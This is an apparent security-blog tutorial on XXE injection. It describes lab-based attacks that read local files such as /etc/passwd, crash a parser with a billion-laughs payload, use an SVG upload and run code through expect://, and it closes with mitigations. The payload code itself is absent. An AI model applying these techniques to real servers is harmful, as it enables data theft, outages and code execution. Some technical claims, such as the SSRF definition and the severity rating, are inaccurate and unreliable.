Comprehensive Guide on XXE Injection

XML is a markup language that is commonly used in web development. It is used for storing and transporting data. So, today in this article, we will learn how an attacker can use this vulnerability to gain the information and try to defame web-application.

XXE Testing Methodology:

  • Introduction to XML
  • Introduction to XXE Injection
  • Impacts
  • XXE For SSRF
    • Local File
    • Remote File
  • XXE Billion Laugh Attack
  • XXE Using File Upload
  • XXE to Remote Code Execution
  • Countermeasures

Introduction to XML

What are XML and Entity?

XML stands for “Extensible Markup Language”,It is the most common language for storing and transporting data. It is a self-descriptive language. It does not contain any predefined tags like <p>, <img>, etc. All the tags are user-defined depending upon the data it is representing for example. <email></email>, <message></message> etc.

  • Version: It is used to specify what version of XML standard is being used.
    • Values: 1.0
  • Encoding: It is declared to specify the encoding to be used. The default encoding that is used in XML is UTF-8.
    • Values: UTF-8, UTF-16, ISO-10646-UCS-2, ISO-10646-UCS-4, Shift_JIS, ISO-2022-JP, ISO-8859-1 to ISO-8859-9, EUC-JP
  • Standalone: It informs the parser if the document has any link to an external source or there is any reference to an external document. The default value is no.
    • Values: yes, no

What is an Entity?

Like there are variables in programming languages we have XML Entity. They are the way of representing data that are present inside an XML document. There are various built-in entities in XML language like &lt; and &gt; which are used for less than and greater than in XML language. All of these are metacharacters that are generally represented using entities that appear in data. XML external entities are the entities that are located outside DTD.

The declaration of an external entity uses the SYSTEM keyword and must specify a URL from which the value of the entity should be loaded. For example

In this syntax Ignite is the name of the entity,

SYSTEM is the keyword used,

URL is the URL that we want to get by performing an XXE attack.

What is the Document Type Definition (DTD)?

It is used for declaration of the structure of XML document, types of data value that it can contain, etc. DTD can be present inside the XML file or can be defined separately. It is declared at the beginning of XML using <!DOCTYPE>.

There are several types of DTDs and the one we are interested in is external DTDs. 

SYSTEM: The system identifier enables us to specify the external file location that contains the DTD declaration.

PUBLIC: Public identifiers provide a mechanism to locate DTD resources and are written as below −

As you can see, it begins with the keyword PUBLIC, followed by a specialized identifier. Public identifiers are used to identify an entry in a catalog.

Introduction to XXE

An XXE is a type of attack that is performed against an application in order to parse its XML input. In this attack XML input containing a reference to an external entity is processed by a weakly configured XML parser.  Like in Cross-Site Scripting (XSS) we try to inject scripts similarly in this we try to insert XML entities to gain crucial information.

It is used for declaration of the structure of XML document, types of data value that it can contain, etc. DTD can be present inside the XML file or can be defined separately. It is declared at the beginning of XML using <!DOCTYPE>.

There are several types of DTDs and the one we are interested in is external DTDs. There are two types of external DTDs:

  1. SYSTEM: System identifier enables us to specify the external file location that contains the DTD declaration

In this XML external entity payload is sent to the server and the server sends that data to an XML parser that parses the XML request and provides the desired output to the server. Then server returns that output to the attacker.


XML External Entity (XXE) can possess a severe threat to a company or a web developer. XXE has always been in Top 10 list of OWASP. It is common as lots of website uses XML in the string and transportation of data and if the countermeasures are not taken then this information will be compromised. Various attacks that are possible are:

  • Server-Side Request Forgery
  • DoS Attack
  • Remote Code Execution
  • Cross-Site Scripting

The CVSS score of XXE is 7.5 and its severity is Medium with –

  • CWE-611: Improper Restriction of XML External Entity.
  • CVE-2019-12153: Local File SSRF
  • CVE-2019-12154: Remote File SSRF
  • CVE-2018-1000838: Billion Laugh Attack
  • CVE-2019-0340: XXE via File Upload

Performing XXE Attack to perform SSRF:

Server-Side Request Forgery (SSRF) is a web vulnerability where the hacker injects server-side HTML codes to get control over the site or to redirect the output to the attacker’s server. File types for SSRF attacks are –

Local File:

These are the files that are present on the website domain like robots.txt, server-info, etc. So, let’s use “bWAPP” to perform an XXE attack at a level set to low.

Now we will fire up our BurpSuite and intercept after pressing Any Bugs? button and we will get the following output on burp:

We can see that there is no filter applied so XXE is possible so we will send it to the repeater and there we will perform our attack.  We will try to know which field is vulnerable or injectable because we can see there are two 0 fields i.e., login and secret.

So, we will test it as follows:

In the repeater tab, we will send the default request and observe the output in the response tab.

It says “bee’s secret has been reset” so it seems that login is injectable but let’s verify this by changing it from bee and then sending the request.

Now again we will be observing its output in response tab:

We got the output “ignite’s secret has been reset”  so it makes it clear that login is injectable. Now we will perform our attack.

Now as we know which field is injectable, let’s try to get the robots.txt file. And for this, we’ll be using the following payload –

Understanding the payload

We have declared a doctype with the name “reset” and then inside that declared an entity named “ignite”. We are using SYSTEM identifier and then entering the URL to robots.txt. Then in login, we are entering “&ignite;” to get the desired information.

After inserting the above code, we will click on send and will get output like below in the response tab:

We can see in the above output that we got all the details that are present in the robots.txt. This tells us that SSRF of the local file is possible using XXE.

So now, let’s try to understand how it all worked. Firstly, we will inject the payload and it will be passed on to the server and as there are no filters present to avoid XXE the server sends the request to an XML parser and then sends the output of the parsed XML file. In this case, robots.txt was disclosed to the attacker using XML query.

Remote File:

These are the files that attacker injects a remotely hosted malicious scripts in order to gain admin access or crucial information. We will try to get /etc/passwd for that we will enter the following command.

After entering the above command as soon as we hit the send button we’ll be reflected with the passwd file !!

XXE Billion Laugh Attack-DOS

These are aimed at XML parsers in which both, well-formed and valid, XML data crashes the system resources when being parsed. This attack is also known as XML bomb or XML DoS or exponential entity expansion attack.

Before performing the attack, lets know why it is known as Billion Laugh Attack?

“For the first time when this attack was done, the attacker used lol as the entity data and the called it multiple times in several following entities. It took exponential amount of time to execute and its result was a successful DoS attack bringing the website down. Due to usage of lol and calling it multiple times that resulted in billions of requests we got the name Billion Laugh Attack”

Before using the payload lets understand it:

In this, we see that at 1 we have declared the entity named “ignite” and then calling ignite in several other entities thus forming a chain of callbacks which will overload the server.  At 2 we have called entity &ignite9; We have called ignite9 instead of ignite as ignite9 calls ignite8 several times and each time ignite8 is called ignite7 is initiated and so on. Thus, the request will take an exponential amount of time to execute and as a result, the website will be down.

Above command results in DoS attack and the output that we got is:

Now after entering the XML command we will not see any output in response field and also bee box is not accessible and it will be down.

XXE Using File Upload

XXE can be performed using the file upload method. We will be demonstrating this using Port Swigger lab “Exploiting XXE via Image Upload”. The payload that we will be using is:

Understanding the payload: We will be making an SVG file as only image files are accepted by the upload area. The basic syntax of the SVG file is given above and in that, we have added a text field that will

We will be saving the above code as “payload.svg”. Now on portswigger, we will go on a post and comment and then we will add the made payload in the avatar field.

Now we will be posting the comment by pressing Post Comment button. After this, we will visit the post on which we posted our comment, and we will see our comment in the comments section.

Let’s check its page source in order to find the comment that we posted. You will find somewhat similar to what I got below

We will be clicking on the above link and we will get the flag in a new window as follows:

This can be verified by submitting the flag and we will get the success message.

Understanding the whole concept: So, when we uploaded the payload in the avatar field and filled all other fields too our comment was shown in the post. Upon examining the source file, we got the path where our file was uploaded. We are interested in that field as our XXE payload was inside that SVG file and it will be containing the information that we wanted, in this case, we wanted”/etc/domain”. After clicking on that link, we were able to see the information.

XXE to Remote code Execution

Remote code execution is a very server web application vulnerability. In this an attacker is able to inject its malicious code on the server in order to gain crucial information. To demonstrate this attack I have used XXE LAB. We will follow below steps to download this lab and to run this on our Linux machine:

In our terminal we will get somewhat similar output as following:

Now once it’s ready to be use we will open the browser and type: and we will see the site looks like this:

We will be entering our details and intercepting the request using Burp Suite. In Burp Suite we will see the request as below:

We will send this request to repeater and we will see which field is vulnerable. So, firstly we will send the request as it is and observe the  response tab:

We can notice that we see only email so we will further check with one more entry to verify that this field is the vulnerable one among all the fields.

From the above screenshot it’s clear that the email field is vulnerable. Now we will enter our payload:

Lets understand the payload before implementing it:

We have created a doctype with the name ”root” and under that, we created an entity named “ignite” which is asking for “expect://id”. If expect is being accepted in a php page then remote code execution is possible. We are fetching the id so we used “id” in this case.

And we can see that we got the uid,gid and group number successfully. This proves that our remote code execution was successful in this case.


Mitigation Steps

  • The safest way to prevent XXE is always to disable DTDs (External Entities) completely. Depending on the parser, the method should be similar to the following:

  • Also, DoS attacks can be prevented by disabling DTD. If it is not possible to disable DTDs completely, then external entities and external document type declarations must be disabled in the way that’s specific to each parser.
  • Another method is using CDATA for ignoring the external entities. CDATA is character data which provides a block which is not parsed by the parser.

Author : Naman Kumar is a  cyber security enthusiast who is trying to gain some knowledge in cyber security field. Contact Here

Source: Hacking Articles

Leave a Reply

Your email address will not be published. Required fields are marked *